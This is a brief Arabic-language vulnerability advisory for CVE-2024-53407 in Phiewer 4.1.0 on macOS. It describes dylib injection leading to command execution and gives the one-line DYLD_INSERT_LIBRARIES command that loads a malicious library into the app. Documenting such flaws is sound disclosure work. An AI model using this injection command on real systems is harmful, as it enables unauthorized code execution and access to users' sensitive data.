
CVE-2024-53407
في Phiewer 4.1.0، يؤدي حقن مكتبة ديناميكية (dylib) إلى تنفيذ أوامر يسمح للمهاجمين بحقن ملف dylib مما قد يؤدي إلى تحكم عن بُعد والوصول غير المصرح به إلى بيانات المستخدم الحساسة في MacOs.
استخدم ملف .dylib لحقن الأمر
DYLD_INSERT_LIBRARIES=exploit_combined.dylib /Applications/Phiewer\ \(lite\).app/Contents/MacOS/Phiewer\ \(lite\)
تنفيذ الأوامر (محلي)